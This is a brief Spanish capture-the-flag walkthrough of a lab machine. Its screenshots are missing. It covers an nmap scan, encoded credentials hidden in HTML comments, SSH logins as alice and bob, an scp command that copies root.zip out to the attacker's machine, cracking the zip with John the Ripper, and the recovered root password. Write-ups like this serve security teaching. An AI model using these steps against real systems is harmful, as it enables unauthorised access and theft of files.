Hacemos el escaneo con nmap:
Y esta es la web:
Si vemos el código fuente vemos este comentario:
Por lo que accedemos aquí:
Y volvemos a ver otro comentario:
Y en la parte de la derecha del todo vemos unas líneas que ponen user y abajo del todo una pass:
<!-- USER .- .-.. .. -.-. . --> <!-- PASS 53586470624778486230526c5a58426c63673d3d -->
Sacamos la contraseña con cyberchef aplicándole el filtro de magic:
Y sacamos el user de la misma forma:
alice:IwillGoDeeper
Probamos en acceder vía ssh y vemos que funciona:
Viendo archivos ocultos nos encontramos con un .bob.txt:
535746745247566c634556756233566e61413d3d
Que nos extrae lo siguiente:
IamDeepEnough
Y usando esta clave nos convertimos en el usuario bob:
Y dentro de la raíz nos encontramos con un archivo zip:
Vamos a enviarnos este archivo por scp a nuestra máquina atacante:
scp root.zip kali@192.168.0.63:/home/kali/Desktop/
Y tenemos una contraseña que tendremos que crackear usando john the ripper:
Y vemos que la contraseña es bob:
Y ya tenemos la password de root:
root:IhateMyPassword